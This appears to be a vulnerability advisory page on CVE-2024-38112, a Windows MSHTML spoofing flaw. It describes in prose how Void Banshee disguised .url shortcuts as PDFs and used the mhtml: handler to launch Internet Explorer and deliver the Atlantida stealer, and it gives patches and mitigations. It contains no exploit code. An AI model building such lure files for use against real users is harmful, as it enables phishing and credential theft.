Search
On this page ▾
CVE-2024-38112 — Microsoft Windows MSHTML Platform Spoofing Vulnerability

CVE-2024-38112

Windows MSHTML — Zero-Day URL File Trick Forces IE Mode to Execute jscript9.dll; Void Banshee APT Deployed Atlantida Stealer
⚠️ CVSS 3.1  7.5 / 10 — HIGH 🔴 CISA Known Exploited Vulnerability

What is the Windows MSHTML Platform?

MSHTML (also called Trident) is the legacy HTML rendering engine originally used by Internet Explorer, now retained as a Windows system component. Despite Internet Explorer's retirement, MSHTML remains on all Windows systems and can be invoked by applications that use the mhtml: URL protocol handler, Windows shell shortcut processing, or the WebBrowser control. MSHTML and its scripting engine (jscript9.dll) are a recurring exploitation target because they represent an older, less hardened code surface that is still reachable from modern Windows — including from innocuous-looking .url shortcut files.

Overview

CVE-2024-38112 is a spoofing vulnerability in the Windows MSHTML platform that was exploited as a zero-day by the Void Banshee APT to silently open Internet Explorer and execute malicious content through jscript9.dll. Attackers distributed crafted .url files that appeared to be PDF documents; when opened, the files invoked the mhtml: protocol handler to launch the disabled Internet Explorer process and load a malicious page that exploited the legacy scripting engine. Haifei Li of Check Point Research discovered the exploitation in the wild; Microsoft and CISA patched and disclosed it simultaneously on July 9, 2024. A related bypass technique (CVE-2024-43461) was later used by the same APT group after this vulnerability was patched.

Affected Versions

OS Status
Windows 10 (all supported versions) Patched July 2024 Patch Tuesday
Windows 11 (all supported versions) Patched July 2024 Patch Tuesday
Windows Server 2008 R2 and later Patched July 2024 Patch Tuesday

Technical Details

CWE-451 (User Interface (UI) Misrepresentation of Critical Information). The attack exploited a gap between what Windows displays to the user and what actually executes when a file is opened. Specifically, crafted .url shortcut files were disguised as PDF documents using icon manipulation and file naming tricks. The shortcut's URL field used the mhtml: protocol handler, which caused Windows to invoke the MSHTML engine and pass the URL to Internet Explorer — a process that appears to be disabled but still exists on the system.

Once Internet Explorer loaded the attacker-controlled URL through MSHTML, the legacy jscript9.dll scripting engine processed JavaScript content. Void Banshee used this to deliver and execute the Atlantida information stealer, which targets credentials stored in browsers, crypto wallet files, and application data.

The High Attack Complexity (AC:H) reflects the social engineering required — the victim must open the disguised .url file — but the Void Banshee campaign demonstrated this was achievable at scale through phishing.

Discovery

Discovered by Haifei Li of Check Point Research, who identified exploitation in the wild in May 2024 and attributed the campaign to the Void Banshee APT group. Void Banshee targets organizations in North America, Europe, and Southeast Asia for credential theft and data exfiltration using information stealers.

Exploitation Context

Void Banshee distributed malicious .url files through phishing campaigns, archive files hosted on sharing sites, and malicious links. The spoofed-PDF shortcut approach is particularly effective because users are conditioned to open PDF files and do not expect a .url shortcut to launch Internet Explorer. The Atlantida stealer payload harvests browser credentials, autofill data, cryptocurrency wallets, and files matching document extensions — providing immediate financial and intelligence value.

The July 2024 patch disabled the mhtml: protocol handler for Internet Explorer launching, but a follow-on bypass (CVE-2024-43461) was discovered and exploited by Void Banshee before that patch was also issued in September 2024.

Remediation

  1. Apply the July 2024 Windows security updates (Patch Tuesday, July 9, 2024) — this addresses the mhtml: IE launch vector.
  2. Also apply the September 2024 Patch Tuesday update for CVE-2024-43461, which patched Void Banshee's follow-on bypass technique.
  3. Consider disabling the mhtml: protocol handler via registry policy if not required for business purposes.
  4. Train users to be suspicious of .url and shortcut files received via email or downloaded from the internet, even when they appear to have document icons.
  5. Block or restrict macro-enabled and shortcut file types (.url, .lnk) in email gateways.

Key Details

PropertyValue
CVE ID CVE-2024-38112
Vendor / Product Microsoft — Windows
NVD Published2024-07-09
NVD Last Modified2025-10-28
CVSS 3.1 Score7.5
CVSS 3.1 VectorCVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
SeverityHIGH
CWE CWE-451 find similar ↗
CISA KEV Added2024-07-09
CISA KEV Deadline2024-07-30
Known Ransomware Use No

CVSS 3.1 Breakdown

Attack Vector
Network
Attack Complexity
High
Privileges Required
None
User Interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Required Action

CISA BOD 22-01 Deadline: 2024-07-30. Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.

Timeline

DateEvent
2024-05-16Haifei Li (Check Point Research) discovers exploitation of CVE-2024-38112 in the wild
2024-07-09Microsoft releases July 2024 Patch Tuesday patching CVE-2024-38112; CISA adds to KEV the same day — confirming zero-day exploitation
2024-07-30CISA BOD 22-01 remediation deadline

References

ResourceType
Microsoft Security Advisory — CVE-2024-38112 Vendor Advisory
NVD — CVE-2024-38112 Vulnerability Database
CISA KEV Catalog Entry US Government
Check Point Research — Void Banshee APT Exploits CVE-2024-38112 Security Research

Last updated: 2026-05-20

Suggest an update ↗

Gavin Hollinger & AI assembled this air-gap friendly HTML